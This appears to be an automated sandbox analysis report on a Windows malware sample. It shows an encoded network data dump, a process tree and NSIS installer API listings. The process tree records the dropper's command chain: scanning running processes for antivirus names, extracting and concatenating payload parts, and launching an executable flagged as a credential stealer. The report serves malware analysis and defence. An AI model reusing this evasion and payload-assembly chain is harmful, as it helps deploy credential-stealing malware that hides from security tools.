tLhQErkp56hAhEinnaR7Hu2IJLhBOAwWLrUqZNlVZ4f9LlsSofnvqkZSDr6WbPzcZcxve0SmBcL4ojssmtUyD3p5z8SgOepvkZNFe50m7RHqC+7igzXMEzn6ujTS1O8Wev7PyP66JuRQiwZk0f2/UqFY6DCC+Z0Bafm+Yx/Ba03tOozBbmqgYZROTbabo/HMfMykP8k0gEIvPvWjVMNogfy3mgzr9GFhHokBp0ovvQmoX2W/RSOAGWP1qa3Rnu/
2024-12-28 08:35:11 UTC	1188	IN	Data Raw: 41 38 76 38 65 6d 68 56 73 47 42 38 42 67 70 63 4e 70 72 7a 75 68 7a 6a 48 48 64 6d 44 36 33 4d 71 71 51 6c 43 6f 4d 39 2f 49 53 53 61 32 39 4e 57 34 65 51 31 56 36 47 69 73 2f 56 79 53 43 64 4c 35 5a 39 41 65 55 4b 54 39 38 61 38 35 56 4c 4e 5a 7a 38 5a 74 53 65 58 4f 70 36 31 41 46 7a 54 70 51 70 33 4d 4c 4c 41 68 6b 4e 4a 2f 38 51 39 58 6f 75 66 32 76 6b 52 4d 76 79 6d 71 35 6c 55 52 67 38 2b 73 76 77 59 62 4e 75 64 74 2f 76 38 6f 38 69 4f 55 6c 77 2b 54 48 33 36 37 2b 4b 79 58 66 67 57 58 55 37 44 6d 4c 44 57 74 70 34 65 58 41 69 73 32 30 6c 4b 74 2f 32 69 31 42 4b 54 42 44 73 4d 53 65 34 62 65 72 35 52 34 53 5a 6b 5a 39 71 64 42 43 37 6a 37 67 37 46 50 4a 68 61 63 55 35 48 69 63 50 49 47 6a 4e 30 61 7a 77 46 2f 35 2f 66 35 68 6a 41 4f 69 44 50 55 74 Data Ascii: A8v8emhVsGB8BgpcNprzuhzjHHdmD63MqqQlCoM9/ISSa29NW4eQ1V6Gis/VySCdL5Z9AeUKT98a85VLNZz8ZtSeXOp61AFzTpQp3MLLAhkNJ/8Q9Xouf2vkRMvymq5lURg8+svwYbNudt/v8o8iOUlw+TH367+KyXfgWXU7DmLDWtp4eXAis20lKt/2i1BKTBDsMSe4ber5R4SZkZ9qdBC7j7g7FPJhacU5HicPIGjN0azwF/5/f5hjAOiDPUt
2024-12-28 08:35:11 UTC	1369	IN	Data Raw: 31 63 65 63 0d 0a 56 52 4c 4d 4b 4f 6a 4e 54 43 69 6b 2f 4e 32 32 65 52 6f 4c 35 6b 69 44 36 56 43 6a 44 74 4c 70 66 4e 59 4a 52 62 4c 33 37 62 4a 6f 56 49 6f 33 74 4e 41 6f 4e 70 72 43 77 70 4d 44 53 68 72 46 62 34 7a 4c 57 62 55 64 33 35 52 2b 34 68 31 55 6b 34 7a 30 73 57 68 7a 75 51 44 33 2f 46 34 4a 6f 63 79 47 75 32 77 66 4c 2b 5a 78 6d 37 51 6d 70 7a 7a 66 6b 43 2b 58 4e 32 36 53 36 71 32 64 59 47 53 52 43 73 2f 4c 56 53 69 45 32 62 33 43 41 44 67 42 78 32 57 68 79 6c 71 55 44 37 48 47 4f 75 6f 65 57 5a 6d 48 32 62 49 39 55 62 49 75 30 65 68 51 46 5a 37 63 6e 4a 78 47 43 41 48 49 57 71 6e 72 5a 2f 45 48 33 2f 41 53 31 53 46 62 74 2b 58 6f 31 31 4e 35 72 44 7a 38 35 54 45 6a 2b 73 4c 43 76 48 38 6e 4e 64 42 47 38 64 49 6f 73 51 58 58 36 33 37 79 63 Data Ascii: 1cecVRLMKOjNTCik/N22eRoL5kiD6VCjDtLpfNYJRbL37bJoVIo3tNAoNprCwpMDShrFb4zLWbUd35R+4h1Uk4z0sWhzuQD3/F4JocyGu2wfL+Zxm7QmpzzfkC+XN26S6q2dYGSRCs/LVSiE2b3CADgBx2WhylqUD7HGOuoeWZmH2bI9UbIu0ehQFZ7cnJxGCAHIWqnrZ/EH3/AS1SFbt+Xo11N5rDz85TEj+sLCvH8nNdBG8dIosQXX637yc
2024-12-28 08:35:11 UTC	1369	IN	Data Raw: 70 7a 48 4e 4b 6e 42 79 77 39 6b 34 38 72 36 71 71 78 31 52 48 4b 2f 73 79 71 2f 52 58 74 54 36 37 69 6a 48 69 41 48 75 51 30 4d 4c 49 56 52 4b 4a 4b 76 50 51 4b 44 69 46 79 70 66 41 59 78 4e 65 33 32 53 51 2f 6c 53 55 65 71 36 54 59 35 45 64 53 75 58 6c 32 72 42 65 57 70 4a 64 78 36 4e 62 55 4a 7a 58 74 4b 78 31 47 51 4b 53 55 36 4c 4d 58 49 59 4f 70 70 4a 39 7a 52 52 33 75 74 4b 73 6a 30 46 58 6e 69 44 31 34 6a 63 2b 67 4e 43 6b 6b 45 49 49 4e 4d 35 52 38 74 4e 4b 69 48 71 30 6c 44 44 58 42 67 32 33 2f 76 61 54 62 6c 65 73 44 4e 37 50 56 42 75 46 7a 71 75 34 42 6a 51 32 2f 7a 71 47 34 53 32 48 48 6f 53 51 41 2f 63 49 57 34 62 38 39 70 64 65 61 37 67 6a 31 65 34 2f 44 35 65 72 31 4b 39 4f 4a 46 2f 4f 64 72 58 38 4a 36 4d 6e 6a 66 55 69 77 67 4a 52 6a 65 Data Ascii: pzHNKnByw9k48r6qqx1RHK/syq/RXtT67ijHiAHuQ0MLIVRKJKvPQKDiFypfAYxNe32SQ/lSUeq6TY5EdSuXl2rBeWpJdx6NbUJzXtKx1GQKSU6LMXIYOppJ9zRR3utKsj0FXniD14jc+gNCkkEIINM5R8tNKiHq0lDDXBg23/vaTblesDN7PVBuFzqu4BjQ2/zqG4S2HHoSQA/cIW4b89pdea7gj1e4/D5er1K9OJF/OdrX8J6MnjfUiwgJRje
2024-12-28 08:35:11 UTC	1369	IN	Data Raw: 61 4b 67 41 30 4d 68 67 44 65 4c 54 69 6f 56 38 43 6a 2f 72 63 36 37 73 4b 49 6b 46 6f 39 55 6d 31 68 42 49 70 59 6e 39 74 30 52 37 74 68 75 69 77 33 4d 5a 67 4e 4b 35 76 47 51 79 4e 4d 56 4d 71 75 31 7a 6b 77 75 68 79 44 2f 73 42 45 61 33 2f 50 2b 41 4f 47 71 57 4c 2b 50 75 64 52 47 6b 7a 39 57 4e 63 77 51 5a 6d 6a 57 33 6f 6c 4f 6b 42 74 66 67 50 4d 41 67 43 2b 4f 55 71 36 35 48 55 4a 6b 70 2f 4d 42 4c 44 4a 2f 76 71 61 4a 58 4a 41 72 73 63 62 37 2b 4e 59 51 78 73 76 45 48 78 78 4d 4f 75 34 37 61 31 33 42 38 71 46 6e 36 79 45 30 4e 37 66 32 4b 78 47 77 4e 4c 65 74 31 76 75 78 79 69 51 57 4a 31 53 2b 56 45 41 71 66 69 4d 36 33 51 6d 2b 32 41 4b 4c 63 55 42 6d 44 39 4c 6d 52 5a 44 56 63 78 55 7a 78 37 58 4f 54 43 39 50 49 65 2f 51 45 54 71 66 37 77 73 68 Data Ascii: aKgA0MhgDeLTioV8Cj/rc67sKIkFo9Um1hBIpYn9t0R7thuiw3MZgNK5vGQyNMVMqu1zkwuhyD/sBEa3/P+AOGqWL+PudRGkz9WNcwQZmjW3olOkBtfgPMAgC+OUq65HUJkp/MBLDJ/vqaJXJArscb7+NYQxsvEHxxMOu47a13B8qFn6yE0N7f2KxGwNLet1vuxyiQWJ1S+VEAqfiM63Qm+2AKLcUBmD9LmRZDVcxUzx7XOTC9PIe/QETqf7wsh

Target ID:	0
Start time:	03:34:22
Start date:	28/12/2024
Path:	C:\Users\user\Desktop\es5qBEFupj.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\es5qBEFupj.exe"
Imagebase:	0x340000
File size:	7'114'240 bytes
MD5 hash:	25C8F6ADA1179E3FCF486844E5C1ED24
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	03:34:25
Start date:	28/12/2024
Path:	C:\Users\user\AppData\Local\Temp\PasoCattle.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\PasoCattle.exe"
Imagebase:	0x400000
File size:	1'062'983 bytes
MD5 hash:	A3E9A86D6EDE94C3C71D1F7EEA537766
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 11%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	03:34:26
Start date:	28/12/2024
Path:	C:\Users\user\AppData\Local\Temp\Set-up.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\Set-up.exe"
Imagebase:	0xfa0000
File size:	6'851'208 bytes
MD5 hash:	2A99036C44C996CEDEB2042D389FE23C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 70%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	03:34:26
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c move Symposium Symposium.cmd & Symposium.cmd
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	03:34:26
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	03:34:28
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x7f0000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	03:34:28
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "opssvc wrsa"
Imagebase:	0x280000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	03:34:30
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x7f0000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	03:34:30
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Imagebase:	0x280000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	03:34:32
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c md 768400
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	03:34:32
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\extrac32.exe
Wow64 process (32bit):	true
Commandline:	extrac32 /Y /E Reflect
Imagebase:	0xd60000
File size:	29'184 bytes
MD5 hash:	9472AAB6390E4F1431BAA912FCFF9707
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	03:34:32
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /V "cocks" Articles
Imagebase:	0x280000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	03:34:33
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b ..\Maternity + ..\Beaches + ..\Rat + ..\Promise + ..\Zone + ..\Enrolled V
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	03:34:33
Start date:	28/12/2024
Path:	C:\Users\user\AppData\Local\Temp\768400\Climb.com
Wow64 process (32bit):	true
Commandline:	Climb.com V
Imagebase:	0xb0000
File size:	947'288 bytes
MD5 hash:	62D09F076E6E0240548C2F837536A46A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000002.2508538313.0000000001081000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000002.2508841125.0000000001158000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000003.2332004575.0000000001155000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	22
Start time:	03:34:33
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	choice /d y /t 5
Imagebase:	0xf30000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Function 054E0590 Relevance: .4, Instructions: 447COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1333568293.00000000054E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_54e0000_es5qBEFupj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7b80762a6676d5dfbf3da64df150262954bf5d258a629923d89c7c453f30bac
Instruction ID: 3833cae55269c6e400115154976f1d1658048b5d8a0d9073ed0e64b70c8fde06
Opcode Fuzzy Hash: a7b80762a6676d5dfbf3da64df150262954bf5d258a629923d89c7c453f30bac
Instruction Fuzzy Hash: 44514A34A00348CFDB09DFB8E5956AE7BB3EF89304F5045A8D0006B398DB75E949CB91

Function 054E0A08 Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1333568293.00000000054E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_54e0000_es5qBEFupj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48e8270b0a35668aec55424624c7122bb029138252e7eaf63675f33d80a08ca8
Instruction ID: d7155a90dd7301e9d1c032c7fce0631c2997a41533481f4b4ba93006ab170b87
Opcode Fuzzy Hash: 48e8270b0a35668aec55424624c7122bb029138252e7eaf63675f33d80a08ca8
Instruction Fuzzy Hash: 5461D3307142049FCB18EB78E15DBAABBA7BF84301F55806AD55A97395DFB0EC01CB90

Function 054E0848 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1333568293.00000000054E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_54e0000_es5qBEFupj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3815aadc432d1e61ff3ce968d35b2e38d4f596ec858623db06a4694458549f41
Instruction ID: a7e237a046db0097335c73357102e601702436b18b30821dea5911dfea2fd3a1
Opcode Fuzzy Hash: 3815aadc432d1e61ff3ce968d35b2e38d4f596ec858623db06a4694458549f41
Instruction Fuzzy Hash: 3A41E834A10309CBDB08DFB8E5956AEBBB3EF89304F604568D1006B398DB75E949CB91

Function 054E0C90 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1333568293.00000000054E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_54e0000_es5qBEFupj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d73c2b93915536fab4a413760b20168a313dcbaa50a0ecf182918a58c3ab7eb
Instruction ID: d469911053b1c616465a241ba2e47827233f3f1c9c2dd1572ced25e4fc1ad752
Opcode Fuzzy Hash: 0d73c2b93915536fab4a413760b20168a313dcbaa50a0ecf182918a58c3ab7eb
Instruction Fuzzy Hash: 8C314131B002554FCB04D7BDA498AFEBBE6EF88211F04446AD42D97342DA70ED02CBD1

Analysis Process: PasoCattle.exePID: 2012, Parent PID: 5600COMMON

Execution Graph

Execution Coverage:	17.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	21%
Total number of Nodes:	1482
Total number of Limit Nodes:	26

Executed Functions

Function 004050F9 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 295
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 0040515B
GetDlgItem.USER32(?,000003EE), ref: 0040516A
GetClientRect.USER32(?,?), ref: 004051C2
GetSystemMetrics.USER32(00000015), ref: 004051CA
SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
ShowWindow.USER32(?,00000008), ref: 00405266
GetDlgItem.USER32(?,000003EC), ref: 00405287
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
GetDlgItem.USER32(?,000003F8), ref: 00405179

Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042A4AD,771B23A0,00000000), ref: 00406902

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

GetDlgItem.USER32(?,000003EC), ref: 004052D7
CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
CloseHandle.KERNELBASE(00000000), ref: 004052EC
ShowWindow.USER32(00000000), ref: 00405313
ShowWindow.USER32(?,00000008), ref: 00405318
ShowWindow.USER32(00000008), ref: 0040535F
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
CreatePopupMenu.USER32 ref: 004053A2
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
GetWindowRect.USER32(?,?), ref: 004053CA
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
OpenClipboard.USER32(00000000), ref: 00405437
EmptyClipboard.USER32 ref: 0040543D
GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
GlobalLock.KERNEL32(00000000), ref: 00405453
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
GlobalUnlock.KERNEL32(00000000), ref: 00405489
SetClipboardData.USER32(0000000D,00000000), ref: 00405494
CloseClipboard.USER32 ref: 0040549A

Strings

{, xrefs: 0040537E
New install of "%s" to "%s", xrefs: 004051AE

Memory Dump Source

Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
String ID: New install of "%s" to "%s"${
API String ID: 2110491804-1641061399
Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58

Function 004038AF Relevance: 52.8, APIs: 22, Strings: 8, Instructions: 304
filestringcomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32 ref: 004038CE
SetErrorMode.KERNELBASE(00008001), ref: 004038D9
OleInitialize.OLE32(00000000), ref: 004038E0

Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353

SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
CoUninitialize.COMBASE(?), ref: 00403AFD
ExitProcess.KERNEL32 ref: 00403B1D
lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C

Strings

NSIS Error, xrefs: 0040390E
/D=, xrefs: 004039D2
Error launching installer, xrefs: 00403AA9
~nsu.tmp, xrefs: 00403B23
_?=, xrefs: 00403A90
NCRC, xrefs: 004039A8
\Temp, xrefs: 00403A47
SeShutdownPrivilege, xrefs: 00403C42

Memory Dump Source

Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd

Similarity

API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
API String ID: 2435955865-3712954417
Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE

Function 00406301 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
FindClose.KERNEL32(00000000), ref: 00406318

Strings

jF, xrefs: 00406302

Memory Dump Source

Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: jF
API String ID: 2295610775-3349280890
Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED

Function 00406328 Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
GetProcAddress.KERNEL32(00000000), ref: 00406353

Memory Dump Source

Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
